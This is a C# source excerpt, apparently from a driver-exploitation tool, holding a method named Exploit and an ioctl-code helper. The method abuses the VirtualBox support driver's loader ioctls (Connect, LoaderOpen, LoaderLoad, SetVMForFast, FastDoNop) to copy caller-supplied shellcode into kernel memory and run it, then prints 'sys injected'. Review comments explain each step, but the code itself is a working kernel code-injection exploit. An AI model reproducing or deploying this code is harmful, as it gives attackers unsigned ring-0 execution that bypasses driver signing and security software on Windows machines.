/// <summary>
/// Drives the VirtualBox support-driver ioctl sequence exposed by this file —
/// Connect, LoaderOpen, LoaderLoad, SetVMForFast, FastDoNop, LoaderFree — handing the
/// caller-supplied <paramref name="shellcode"/> buffer to the driver's loader. Every step
/// is an ioctl on <c>DeviceHandle</c>; a step whose reply carries a zero cookie is treated
/// as failed and a plain <see cref="Exception"/> is thrown. The request buffers carry fixed
/// literal strings ("tori", "The Magic Word!", "shalzuth") that appear verbatim in the
/// ioctl input.
/// </summary>
/// <param name="shellcode">Bytes copied verbatim into the LoaderLoad request payload.</param>
/// <param name="codeSize">Size reported to the driver as CodeSize (LoaderOpen) and ImageSize (LoaderLoad).</param>
/// <param name="dataOffset">Not referenced anywhere in this method body.</param>
/// <exception cref="Exception">Thrown when any ioctl reply has a zero cookie, or when FastDoNop returns a non-zero value.</exception>
public static void Exploit(Byte[] shellcode, Int32 codeSize, Int32 dataOffset)
{
    // Connect request. The header magic is the 4 bytes of "tori" reinterpreted as a UInt32 via
    // BitConverter (host byte order). Encoding.Default is platform-dependent, but every string
    // encoded in this method is ASCII-only, so the bytes are stable.
    var connect = new ConnectIn { Header = new Header(BitConverter.ToUInt32(Encoding.Default.GetBytes("tori"), 0), 0, Marshal.SizeOf<ConnectIn>(), Marshal.SizeOf<ConnectOut>()) };
    connect.RequestedVersion = 0;
    // Interface version the driver is asked for; what the driver accepts is defined on its side, not here.
    connect.InterfaceVersion = 0x00070002;
    // Exactly 15 bytes are copied into MagicWord; the field's capacity is not visible here — assumed >= 15 (review).
    Marshal.Copy(Encoding.Default.GetBytes("The Magic Word!").ToArray(), 0, new IntPtr(connect.MagicWord), 15);
    var cookie = Natives.DeviceIoControl<ConnectOut>(DeviceHandle, Connect, connect);
    // The cookie returned by Connect is reused in every later request header (CreateHeader(cookie)).
    if (cookie.Cookie == 0) { throw new Exception("Connect to VBox Failed"); }

    // LoaderOpen: reserves an image of codeSize bytes; the reply's ImageBase is the address used below.
    var ldrOp = new LdrOpIn { Header = Header.CreateHeader<LdrOpIn, LdrOpOut>(cookie), CodeSize = codeSize };
    // 8-byte fixed name tag; NameTag capacity not visible here — assumed >= 8 (review).
    Marshal.Copy(Encoding.Default.GetBytes("shalzuth").ToArray(), 0, new IntPtr(ldrOp.NameTag), 8);
    var ldrOpOut = Natives.DeviceIoControl<LdrOpOut>(DeviceHandle, LoaderOpen, ldrOp);
    if (ldrOpOut.Header.Cookie == 0) { throw new Exception("Loader Open Failed"); }
    Console.WriteLine("ldrOpOut.ImageBase : " + ldrOpOut.ImageBase.ToString("X"));
    var imageBase = ldrOpOut.ImageBase;

    // LoaderLoad. The header is sized for LdrLdInWithPayload (not LdrLdIn) because the
    // with-payload wrapper is the struct actually sent to the driver below.
    var ldrLd = new LdrLdIn { Header = Header.CreateHeader<LdrLdInWithPayload, Header>(cookie) };
    ldrLd.EntryPointType = 1; //SUPLDRLOADEP_VMMR0
    // Image base and all three handler entry fields point at the same address returned by LoaderOpen.
    ldrLd.ImageBase = ldrLd.ModuleHandlerEntryEx = ldrLd.ModuleHandlerEntryFast = ldrLd.ModuleHandlerEntryInt = imageBase;
    // 0x1a000 is a magic constant; the same literal is sent again as Ring0VMPtr below. Its meaning
    // is not established anywhere in this method (review).
    ldrLd.ModuleHandler = 0x1a000;
    ldrLd.ImageSize = codeSize;
    var ldrLdWithPayload = new LdrLdInWithPayload { LdrLd = ldrLd };
    // NOTE(review): shellcode.Length is copied without being checked against codeSize or against
    // the capacity of the Payload field, neither of which is validated here.
    Marshal.Copy(shellcode, 0, new IntPtr(ldrLdWithPayload.Payload), shellcode.Length);
    if (Natives.DeviceIoControl<Header>(DeviceHandle, LoaderLoad, ldrLdWithPayload).Cookie == 0) { throw new Exception("Loader Load Failed"); }

    // SetVMForFast with the same 0x1a000 literal used for ModuleHandler above.
    var setVmForFast = new SetVMForFastIn { Header = Header.CreateHeader<SetVMForFastIn, Header>(cookie), Ring0VMPtr = 0x1a000 };
    if (Natives.DeviceIoControl<Header>(DeviceHandle, SetVMForFast, setVmForFast).Cookie == 0) { throw new Exception("Set VM Failed"); }
    // FastDoNop is the one step checked by its UInt64 return value (non-zero = failure) rather than by a cookie.
    if (Natives.DeviceIoControl<UInt64>(DeviceHandle, FastDoNop, new NopIn()) != 0) { throw new Exception("Fast NOP Failed"); }
    Console.WriteLine("sys injected, freeing");

    // LoaderFree releases the image reserved by LoaderOpen; it is not reached if any earlier step threw.
    var ldrFree = new LdrFreeIn { Header = Header.CreateHeader<LdrFreeIn, Header>(cookie), ImageBase = imageBase };
    if (Natives.DeviceIoControl<Header>(DeviceHandle, LoaderFree, ldrFree).Cookie == 0) { throw new Exception("Load Free Failed"); }
}
/// <summary>
/// Packs one of this file's function numbers into a full ioctl control code via
/// <c>Natives.CTL_CODE</c>: device type <c>FILE_DEVICE_UNKNOWN</c>, the function number
/// with bit 0x80 set, buffered transfer method, and a trailing argument of 2 (the access
/// field, if this wrapper mirrors the Windows CTL_CODE macro — not verifiable here).
/// </summary>
/// <param name="Function">Function number to encode; 0x80 is OR'ed in before packing.</param>
/// <returns>The control code produced by <c>Natives.CTL_CODE</c>.</returns>
public static Int32 IOCTL(Int32 Function)
{
    const Int32 customFunctionBit = 0x80;
    var functionCode = Function | customFunctionBit;
    return Natives.CTL_CODE(Natives.FILE_DEVICE_UNKNOWN, functionCode, Natives.CtlMethod.Buffered, 2);
}